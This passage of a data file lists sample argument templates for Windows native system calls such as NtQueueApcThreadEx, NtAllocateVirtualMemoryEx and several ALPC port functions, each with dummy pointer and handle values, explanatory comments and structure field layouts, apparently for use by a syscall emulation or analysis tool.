\"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG Flags (0, typical for default enumeration)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000040\",\r\n \"additionalComment\": \"ULONG HandleAttributes (OBJ_CASE_INSENSITIVE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00100000\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (THREAD_QUERY_LIMITED_INFORMATION)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE ThreadHandle (None for first thread enumeration)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle, process whose threads are being enumerated)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueueApcThreadEx\": {\r\n \"ntFunc\": \"NtQueueApcThreadEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID ApcArgument3 (None, typical for unused argument)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID ApcArgument2 (None, typical for unused argument)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID ApcArgument1 (None, typical for unused argument)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"PPS_APC_ROUTINE ApcRoutine (dummy function pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE UserApcReserveHandle (None, typical usage)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ThreadHandle (dummy handle, target thread)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtUmsThreadYield\": {\r\n \"ntFunc\": \"NtUmsThreadYield\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID SchedulerParam (None, typical usage)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAllocateUserPhysicalPages\": {\r\n \"ntFunc\": \"NtAllocateUserPhysicalPages\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG_PTR UserPfnArray (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to ULONG_PTR NumberOfPages (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAllocateVirtualMemoryEx\": {\r\n \"ntFunc\": \"NtAllocateVirtualMemoryEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"ULONG ExtendedParameterCount (example: 2 parameters)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to MEM_EXTENDED_PARAMETER array (dummy pointer)\",\r\n \"structurePointer\": \"MEM_EXTENDED_PARAMETER\",\r\n \"structureRef\": \"struct16\",\r\n \"structureValueExpectations\": \"Array of MEM_EXTENDED_PARAMETER structures describing extended allocation options.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000040\",\r\n \"additionalComment\": \"ULONG PageProtection (PAGE_EXECUTE_READWRITE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG AllocationType (MEM_COMMIT)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to SIZE_T RegionSize (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00020000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to PVOID BaseAddress (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00400000\"\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct16\": {\r\n \"type\": \"MEM_EXTENDED_PARAMETER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Type\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"MEM_EXTENDED_PARAMETER_TYPE\"\r\n },\r\n {\r\n \"fieldName\": \"Reserved\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Reserved, must be zero\"\r\n },\r\n {\r\n \"fieldName\": \"ULong64\",\r\n \"fieldType\": \"ULONG64\",\r\n \"fieldValue\": \"0x0000000000000001\",\r\n \"fieldComment\": \"Sample value for extended parameter\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtAlpcAcceptConnectPort\": {\r\n \"ntFunc\": \"NtAlpcAcceptConnectPort\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN AcceptConnection (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to ALPC_MESSAGE_ATTRIBUTES ConnectionMessageAttributes (dummy pointer)\",\r\n \"structurePointer\": \"ALPC_MESSAGE_ATTRIBUTES\",\r\n \"structureRef\": \"struct17\",\r\n \"structureValueExpectations\": \"Attributes for the connection message.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to PORT_MESSAGE ConnectionRequest (dummy pointer)\",\r\n \"structurePointer\": \"PORT_MESSAGE\",\r\n \"structureRef\": \"struct18\",\r\n \"structureValueExpectations\": \"PORT_MESSAGE structure describing the connection request.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to PortContext (dummy pointer, context value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to ALPC_PORT_ATTRIBUTES PortAttributes (dummy pointer)\",\r\n \"structurePointer\": \"ALPC_PORT_ATTRIBUTES\",\r\n \"structureRef\": \"struct19\",\r\n \"structureValueExpectations\": \"Attributes for the new port.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES ObjectAttributes (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct20\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG Flags (default: 0)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ConnectionPortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00a0\",\r\n \"additionalComment\": \"Pointer to HANDLE PortHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct17\": {\r\n \"type\": \"ALPC_MESSAGE_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"AllocatedAttributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Sample attribute flag\"\r\n },\r\n {\r\n \"fieldName\": \"ValidAttributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Sample valid attribute\"\r\n }\r\n ]\r\n },\r\n \"struct18\": {\r\n \"type\": \"PORT_MESSAGE\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"u1.Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Message length\"\r\n },\r\n {\r\n \"fieldName\": \"u1.ZeroInit\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"Zero-initialized\"\r\n },\r\n {\r\n \"fieldName\": \"u2.Type\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0001\",\r\n \"fieldComment\": \"Message type\"\r\n },\r\n {\r\n \"fieldName\": \"u2.DataInfoOffset\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"No data info\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId.UniqueProcess\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x99994444\",\r\n \"fieldComment\": \"Dummy process ID\"\r\n },\r\n {\r\n \"fieldName\": \"ClientId.UniqueThread\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Dummy thread ID\"\r\n },\r\n {\r\n \"fieldName\": \"MessageId\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Sample message ID\"\r\n },\r\n {\r\n \"fieldName\": \"ClientViewSize\",\r\n \"fieldType\": \"SIZE_T\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"No client view\"\r\n }\r\n ]\r\n },\r\n \"struct19\": {\r\n \"type\": \"ALPC_PORT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Flags\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Sample flag\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQos.Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x0000000C\",\r\n \"fieldComment\": \"SECURITY_QUALITY_OF_SERVICE length\"\r\n },\r\n {\r\n \"fieldName\": \"MaxMessageLength\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00001000\",\r\n \"fieldComment\": \"4KB max message\"\r\n },\r\n {\r\n \"fieldName\": \"MemoryBandwidth\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Default\"\r\n },\r\n {\r\n \"fieldName\": \"MaxPoolUsage\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Default\"\r\n },\r\n {\r\n \"fieldName\": \"MaxSectionSize\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Default\"\r\n },\r\n {\r\n \"fieldName\": \"MaxViewSize\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Default\"\r\n },\r\n {\r\n \"fieldName\": \"MaxTotalSectionSize\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Default\"\r\n }\r\n ]\r\n },\r\n \"struct20\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtAlpcCancelMessage\": {\r\n \"ntFunc\": \"NtAlpcCancelMessage\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd00b0\",\r\n \"additionalComment\": \"Pointer to ALPC_CONTEXT_ATTRIBUTES MessageContext (dummy pointer)\",\r\n \"structurePointer\": \"ALPC_CONTEXT_ATTRIBUTES\",\r\n \"structureRef\": \"struct21\",\r\n \"structureValueExpectations\": \"Context attributes for the message.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG Flags (default: 0)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct21\": {\r\n \"type\": \"ALPC_CONTEXT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"AttributeFlags\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Sample context attribute\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtAlpcCreatePort\": {\r\n \"ntFunc\": \"NtAlpcCreatePort\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd00c0\",\r\n \"additionalComment\": \"Pointer to ALPC_PORT_ATTRIBUTES PortAttributes (dummy pointer)\",\r\n \"structurePointer\": \"ALPC_PORT_ATTRIBUTES\",\r\n \"structureRef\": \"struct22\",\r\n \"structureValueExpectations\": \"Attributes for the new port.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00d0\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES ObjectAttributes (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct23\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00e0\",\r\n \"additionalComment\": \"Pointer to HANDLE PortHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct22\": {\r\n \"type\": \"ALPC_PORT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Flags\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Sample flag\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQos.Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x0000000C\",\r\n \"fieldComment\": \"SECURITY_QUALITY_OF_SERVICE length\"\r\n },\r\n {\r\n \"fieldName\": \"MaxMessageLength\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00001000\",\r\n \"fieldComment\": \"4KB max message\"\r\n },\r\n {\r\n \"fieldName\": \"MemoryBandwidth\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Default\"\r\n },\r\n {\r\n \"fieldName\": \"MaxPoolUsage\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Default\"\r\n },\r\n {\r\n \"fieldName\": \"MaxSectionSize\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Default\"\r\n },\r\n {\r\n \"fieldName\": \"MaxViewSize\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Default\"\r\n },\r\n {\r\n \"fieldName\": \"MaxTotalSectionSize\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Default\"\r\n }\r\n ]\r\n },\r\n \"struct23\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtAlpcCreatePortSection\": {\r\n \"ntFunc\": \"NtAlpcCreatePortSection\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG ActualSectionSize (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00001000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to HANDLE AlpcSectionHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00020000\",\r\n \"additionalComment\": \"ULONG SectionSize (128 KB typical section size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE SectionHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG Flags (default, no flags)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000555\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAlpcCreateResourceReserve\": {\r\n \"ntFunc\": \"NtAlpcCreateResourceReserve\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to HANDLE ResourceID (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00004000\",\r\n \"additionalComment\": \"SIZE_T MessageSize (16 KB typical message size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG Reserved (must be zero)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000555\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAlpcCreateSectionView\": {\r\n \"ntFunc\": \"NtAlpcCreateSectionView\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to ALPC_DATA_VIEW ViewAttributes (dummy pointer)\",\r\n \"structurePointer\": \"ALPC_DATA_VIEW\",\r\n \"structureRef\": \"struct24\",\r\n \"structureValueExpectations\": \"Base address, size, and flags for the section view.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG Reserved (must be zero)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000555\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct24\": {\r\n \"type\": \"ALPC_DATA_VIEW\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Base\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00400000\",\r\n \"fieldComment\": \"Base address of the section view\"\r\n },\r\n {\r\n \"fieldName\": \"Size\",\r\n \"fieldType\": \"SIZE_T\",\r\n \"fieldValue\": \"0x00001000\",\r\n \"fieldComment\": \"Size of the view (4 KB)\"\r\n },\r\n {\r\n \"fieldName\": \"Flags\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"View is committed\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtAlpcCreateSecurityContext\": {\r\n \"ntFunc\": \"NtAlpcCreateSecurityContext\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to ALPC_SECURITY_ATTRIBUTES SecurityAttribute (dummy pointer)\",\r\n \"structurePointer\": \"ALPC_SECURITY_ATTRIBUTES\",\r\n \"structureRef\": \"struct25\",\r\n \"structureValueExpectations\": \"Security descriptor, context flags, QoS, etc.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG Reserved (must be zero)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000555\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct25\": {\r\n \"type\": \"ALPC_SECURITY_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Flags\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Default security context\"\r\n },\r\n {\r\n \"fieldName\": \"QoS\",\r\n \"fieldType\": \"SECURITY_QUALITY_OF_SERVICE\",\r\n \"fieldValue\": \"0xbadd0050\",\r\n \"fieldComment\": \"Pointer to SECURITY_QUALITY_OF_SERVICE (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PSECURITY_DESCRIPTOR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (no custom security descriptor)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtAlpcDeletePortSection\": {\r\n \"ntFunc\": \"NtAlpcDeletePortSection\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE SectionHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG Reserved (must be zero)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000555\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAlpcDeleteResourceReserve\": {\r\n \"ntFunc\": \"NtAlpcDeleteResourceReserve\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x0000abcd\",\r\n \"additionalComment\": \"HANDLE ResourceID (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"__reserved ULONG (must be zero)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000cafe\",\r\n \"additionalComment\": \"HANDLE PortHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAlpcDeleteSectionView\": {\r\n \"ntFunc\": 